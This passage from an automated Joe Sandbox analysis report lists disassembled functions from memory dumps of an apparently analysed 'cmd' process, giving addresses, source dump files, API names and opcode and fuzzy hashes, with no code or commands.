                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: e6ba1e2a830b874512fbc45de79ff54c18a8cffe3e5c7f8362b7e6c3047fc7ea
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: FE51B335BD8A0A87E736DF16AC4865A7BB0F384BC1F401118DD5A43FA4DB38CA55CB08
                                            Function 00000253FC432AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: a067a5e322b4bd81c05b3f4d1e423c6038de3b4de8b9b46c89b57c050558addf
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 1D51E635A58E0A87E736CF16AC4865A77A0F3C8BC2F901028DE5A43F55DF39CA15DB08
                                            Function 00000253FC405E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: ff2e5cb798059ff36db51ac6ada8bb3a66f1072125d7116f338f12ca9dd863ba
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 3961DB329EDA4886E761CB15E85835ABBE0F388785F102115FA8D43FA8DB7DC650CB08
                                            Function 00000253FC435E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: 510aa9228cd74a7c7699de3070206a9fcfe3036056f7ed416eb300a20ffa0654
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 3161DA3696CB4886E761CB55E84831AB7E0F3C8785F502525EA8D43FA8DB7CC660DB08
                                            Function 00000253FC403EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 5d2ebbe726096747bc43f3feda664cb961532e0ffcd728e071bfa11921dbdbae
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 99113336E89B4497EB26CB61E8087596B70F784BC1F041126DE9D03B64EB7DC664C788
                                            Function 00000253FC433EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 316a2c1a2f31f5b1a2d1d34bfb432eaddd61736101ac6fb213dcaa7f146468f4
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 09116036E08B4483EB25CB21E80874A67B0FB85BC2F540026DE5D03B94EB7DCA65C788
                                            Function 00000253FC408CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 37981bb996aded8a7590e53062efd924c93ded5781a060bdaa07e9cf74c929f8
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 00514A32BD9E088ADB16CF15E90CB6C3791F754BD9F005120DE4A87BA8DB78CA65C704
                                            Function 00000253FC438CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 75c335eb18cb9709385421223b7e7f25559b7d907d4c40222ab12ffac17d1330
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 69513832B49E088ADB16CF15D80CB6CB391F394BD9F905132DE4A87B88D77ACA65D704
                                            Function 00000253FC40AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 1f646d717a283c9b5ecb16e2a7c41d1d221c04b347df6d7c3c3950cc47db39cd
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: DC51B0339C8A888BEB76CF1199483587BA0F354BC6F156116DB8947FE5CB38C660C719
                                            Function 00000253FC40A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: b802094a36a5b58dd2dddcc4e49558627023f015f019adc247a681c435bd2d16
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 3D61B073988FC881DB22CF15E84479AB7A0F794BD9F045615EBD817BA5DB38C2A4CB04
                                            Function 00000253FC43AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: bb40833eb9cf79e32db870993989b7de30a8f7030f7fc0ee9fd5dbd7ed0986a1
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: B051D0329C8A4887EB36CF5198483587BA0F3D4BC6F946125DB8947FD1CB38C660E719
                                            Function 00000253FC43A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: f3bdf7457294e6e687a2d3dacf688528f7c08d3fccf31e2d1341117e8f55bb85
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: C861CF72948BC881EB22CF55E84439AB7A0F7D5BD9F445625EB8813B95CB38C2A4CB04
                                            Function 00000253FC3D9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 2e10d0cf325600c3561fdb30cf56c158ff606b1ab13ad2282e8309f454e49b47
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 8751D032988B4C8AEB30CFA19A5839877A4E354BCAF146117DA8947F85CB3CC650C74A
                                            Function 00000253FC403950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 22bc3db451bfb27a3656172b0af6eb515a5d24810a68155a3536fb412eabe5d4
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 6411BB31BD8F8951E712D725EC0D35A57A4F7847C1F901425AE4983EA4EF34CA25CB08
                                            Function 00000253FC433950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: e9446edf6ae0ca99f98a489eea980a91d20f21cf0efe9611d6756f54dad83905
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 3011B731B58F8991EB12DB25EC0839A52A4F7C47C2FD410319E4D83E94EF38CA26D708
                                            Function 00000253FC411FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: b92cb9f217b573c9d97c2526068f27ed21771c7872bcf10f2edf8cfe25104d7a
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 94D1D132B58A9889E722CFA6D8443DC37B1F3547D9F405216CE9DA7F99DA34C226C344
                                            Function 00000253FC441FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: eefb187e49197ae5781286d23f233bb9e1022043521d7903fef02fadc3570a2f
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 40D10232B18E4889E722CFA5D8486EC37B1F354BDAF505216CE5DA7F99DA34C226C304
                                            Function 00000253FC4014A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: df0d786843b48ec81609c93ab77edd5a81fb52fd8a6683c4f7cc0788b813ae56
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: F7015732E94E84DAE716DF67AC0828977A0F788FD1B095025DF9A43B28DE34D161C744
                                            Function 00000253FC4314A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 99f2fb384c74aa6eabeccf8d80b6544d2a2d04ab8d43210a8110a8ac63cc5ad8
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 42015732E54E84DAEB15DF66AC0858977A0F788FC1B195025DF5A43B28DE34D161CB44
                                            Function 00000253FC4128F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000253FC4128DF), ref: 00000253FC412A12
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
